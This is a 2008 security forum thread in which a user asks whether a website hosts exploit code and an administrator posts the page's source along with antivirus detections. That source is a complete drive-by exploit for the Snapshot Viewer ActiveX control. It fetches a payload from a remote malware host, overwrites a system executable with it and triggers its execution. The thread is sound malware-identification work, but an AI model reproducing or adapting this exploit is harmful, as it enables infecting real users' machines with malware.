Author Topic: [Question] Is this a exploit code?  (Read 3866 times)

0 Members and 1 Guest are viewing this topic.

July 30, 2008, 02:47:43 am
Read 3866 times

pcaccent

  • Special Access
  • Sr. Member

  • Offline
  • *

  • 190
While I analyzed some website, i notice that suspicous Snapshot Viewer ActiveX Control Vulnerability exploit code.
I am not sure whether it is exploit code or not.

see this page.
Quote
hxxp://jzm015.cn/ss.html


July 30, 2008, 06:30:18 am
Reply #1

MysteryFCM

  • Administrator
  • Hero Member

  • Offline
  • *****

  • 1693
  • Personal Text
    Phishing Phanatic
    • I.T. Mate
Code: [Select]
*****************************************************************
vURL Desktop Edition v0.3.2 Results
Source code for: http://jzm015.cn/ss.html
Server IP: 58.53.128.61 [ Resolution failed ]
hpHosts Status: Not Listed
MDL Status: Not Listed
PhishTank Status: Not Listed
Date: 30 July 2008
Time: 07:24:14:24
*****************************************************************
<script>
function GetRoot()
{
for (index = 2, root = ""; index <= 26; index++)
{
root = String.fromCharCode(65 + index);
var outlook = new Image();
outlook.src = "res://" + root +":\\Program Files\\Outlook Express\\msoeres.dll/#2/1";
if (outlook.height == 59)
{
break;
}
outlook = '';
}
return root;
}

function Exploit(url)
{
var root = GetRoot();
// Not Find
if (root == '[')
return;
try
{
var obj = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
}catch(e)
{
if (obj != "[object]")
return;
}

obj.SnapshotPath = url;
try
{
obj.CompressedPath = root +":\\Program Files\\Outlook Express\\wab.exe";
obj.PrintSnapshot();
}catch(e){};

var iv = setInterval(function(){
if (obj.readyState == 4) {
clearInterval(iv);
window.location = "ldap://";
}
}, 3000)
}

Exploit("http://down.hs7yue.cn/down/ko.css");
</script>

TR/ATRAPS.Gen (AntiVir): down.hs7yue.cn/down/ko.css

Also available: TR/Dldr.Small.xxg;

down.hs7yue.cn/down/ko.exe
Regards

Steven Burn
I.T. Mate / hpHosts
it-mate.co.uk / hosts-file.net